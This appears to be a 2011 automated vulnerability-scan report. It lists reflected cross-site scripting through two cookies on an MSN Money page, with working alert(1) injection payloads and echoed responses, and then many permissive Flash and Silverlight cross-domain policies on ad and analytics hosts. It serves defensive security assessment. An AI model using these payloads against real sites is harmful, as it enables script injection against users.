<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn61497"-alert(1)-"12b550c25c9"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfd38"-alert(1)-"37f2d2542d7 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc5a9"-alert(1)-"7be52016318 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwndc5a9"-alert(1)-"7be52016318"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3285e"-alert(1)-"c52e77c0b7f was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b25a"-alert(1)-"ecd2518c6a1 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... ascript'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("http://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn2b25a"-alert(1)-"ecd2518c6a1"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a93fe"-alert(1)-"ce20752a9b2 was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9d95"-alert(1)-"599a6a07add was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the anonymous_userid_1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbf7f"-alert(1)-"293cb6420bc was submitted in the anonymous_userid_1 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d229a"-alert(1)-"e585a11d57f was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60c4d"-alert(1)-"00c0d436f58 was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><meta c ...[SNIP]... script'> var R3_COMMON = new r3_common(); R3_COMMON.setApiKey("756bd9ec9a083c52"); R3_COMMON.setBaseUrl("https://recs.richrelevance.com/rrserver/"); R3_COMMON.setSessionId("bijb1vookoje2tnvwh5oouwn60c4d"-alert(1)-"00c0d436f58"); R3_COMMON.setUserId("{71c28bcc-895f-4239-9850-58ed6aba178d}");
The value of the ASP.NET_SessionId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa8a7"-alert(1)-"06f8a7e059a was submitted in the ASP.NET_SessionId cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: amch.questionmarket.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ar.voicefive.com
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 26 Apr 2011 18:36:14 GMT Content-Type: text/xml Connection: close Vary: Accept-Encoding Accept-Ranges: bytes Content-Length: 230 Vary: Accept-Encoding,User-Agent P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.voicefive.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: bs.serving-sys.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT Accept-Ranges: bytes ETag: "0e2c3cba13c91:0" P3P: CP="NOI DEVa OUR BUS UNI" Date: Tue, 26 Apr 2011 20:11:04 GMT Connection: close Content-Length: 100
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c.atdmt.com
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT Accept-Ranges: bytes ETag: "0ac2dec217dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:35 GMT Connection: keep-alive Content-Length: 109
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c.msn.com
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT Accept-Ranges: bytes ETag: "0ac2dec217dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:35 GMT Connection: keep-alive Content-Length: 109
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: col.stc.s-msn.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca01 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:35 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: col.stj.s-msn.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca04 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:35 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: colstc.msn.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca04 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:35 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: colstj.msn.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca04 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Content-Length: 224 Age: 1 Date: Tue, 26 Apr 2011 18:36:36 GMT Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Expires: Wed, 25 Apr 2012 18:36:35 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: img.widgets.video.s-msn.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: now.eloqua.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Content-Type: text/xml Last-Modified: Tue, 26 May 2009 19:46:00 GMT Accept-Ranges: bytes ETag: "04c37983adec91:0" Server: Microsoft-IIS/7.5 P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA", X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 20:58:44 GMT Connection: keep-alive Content-Length: 206
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omnituremarketing.tt.omtrdc.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: rad.msn.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 18 Mar 2011 23:41:08 GMT Accept-Ranges: bytes ETag: "024af4c5e5cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:15 GMT Connection: keep-alive Content-Length: 202
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: spe.atdmt.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Expires: Tue, 03 May 2011 18:29:24 GMT Date: Tue, 26 Apr 2011 18:36:13 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.wsod.com
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Tue, 26 Apr 2011 18:36:13 GMT Content-Type: text/xml Connection: close Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT ETag: "61f4da-20a-47fbe8ebb5c80" Accept-Ranges: bytes Content-Length: 522 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 634 Content-Type: text/xml Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Date: Tue, 26 Apr 2011 18:36:36 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-04-26T18%3a36%3a36; expires=Fri, 06-May-2011 18:36:36 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=B6AEB400DC4D4E248F334E741402ECE2; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1744956&MS=1744956; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=9E15B52EB3D04623BB2A34AE4C582277; expires=Thu, 25-Apr-2013 18:36:36 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110426; expires=Thu, 25-Apr-2013 18:36:36 GMT; domain=.bing.com; path=/
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-http-request-headers-from domain="*.bing.com" he ...[SNIP]... <allow-access-from domain="*.bing.com"/> ...[SNIP]... <allow-access-from domain="blstc.msn.com"/> ...[SNIP]... <allow-access-from domain="stc.sandblu.msn-int.com"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: investing.money.msn.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 12 Apr 2011 23:05:34 GMT Accept-Ranges: bytes ETag: "033a72066f9cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:12 GMT Connection: close Content-Length: 135
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: static.ak.connect.facebook.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-FB-Server: 10.32.145.112 X-Cnection: close Date: Tue, 26 Apr 2011 21:03:25 GMT Content-Length: 1473 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.actonsoftware.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"596-1300332243000" Last-Modified: Thu, 17 Mar 2011 03:24:03 GMT Content-Type: application/xml Content-Length: 596 Date: Tue, 26 Apr 2011 21:00:34 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.msn.com
Response
HTTP/1.1 200 OK Connection: keep-alive Date: Tue, 26 Apr 2011 18:36:36 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: CO1MPPRENA36 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Cache-Control: no-cache ETag: "80599becb6b4c71:803" Last-Modified: Fri, 22 Jun 2007 10:20:15 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 214
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: citi.bridgetrack.com
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 508 Content-Type: text/html Date: Tue, 26 Apr 2011 18:36:15 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: data.moneycentral.msn.com
Response
HTTP/1.1 200 OK Content-Length: 381 Content-Type: text/xml Last-Modified: Tue, 03 Feb 2009 07:27:42 GMT Accept-Ranges: bytes ETag: "583b68e6d085c91:6fa2" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 18:36:17 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: freemanco.app5.hubspot.com
Response
HTTP/1.1 200 OK Content-Length: 206 Content-Type: text/xml Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT Accept-Ranges: bytes ETag: "04cb8acf11c81:ca8c" Server: Microsoft-IIS/6.0 P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR" X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 20:13:03 GMT Connection: close Set-Cookie: HUBSPOT159=554767532.0.0000; path=/
<?xml version="1.0" ?> <!DOCTYPE cross-domain-policy (View Source for full doctype...)> - <cross-domain-policy> <allow-access-from domain="www.bluemedia.com" secure="true" /> </cross-domain-p ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: moneycentral.msn.com
Response
HTTP/1.1 200 OK Content-Length: 385 Content-Type: text/xml Last-Modified: Tue, 08 Dec 2009 07:29:38 GMT Accept-Ranges: bytes ETag: "ce2e2033d877ca1:518a" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Tue, 26 Apr 2011 18:36:12 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.omniture.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.voicefive.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: c.atdmt.com
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT Accept-Ranges: bytes ETag: "0ac2dec217dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:36 GMT Connection: keep-alive Content-Length: 340
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: c.msn.com
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Content-Type: text/xml Last-Modified: Fri, 05 Nov 2010 19:44:56 GMT Accept-Ranges: bytes ETag: "0ac2dec217dcb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:35 GMT Connection: keep-alive Content-Length: 340
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: img.widgets.video.s-msn.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: rad.msn.com
Response
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 18 Mar 2011 23:41:08 GMT Accept-Ranges: bytes ETag: "024af4c5e5cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Tue, 26 Apr 2011 18:36:16 GMT Connection: keep-alive Content-Length: 337
The application publishes a Silverlight cross-domain policy which allows access from any domain.
